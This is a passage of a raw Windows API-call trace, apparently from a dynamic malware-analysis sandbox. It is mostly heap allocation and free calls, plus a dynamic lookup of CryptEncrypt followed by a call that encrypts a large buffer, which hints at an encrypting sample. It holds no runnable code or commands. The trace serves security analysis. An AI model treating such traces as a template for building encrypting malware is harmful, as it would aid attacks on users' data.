hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.053] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.053] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.054] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.054] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0262.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.056] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0262.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.056] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.057] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.057] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.057] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34cae10 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.064] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0262.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0262.065] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x18bb1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x18bb8) returned 1 [0262.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 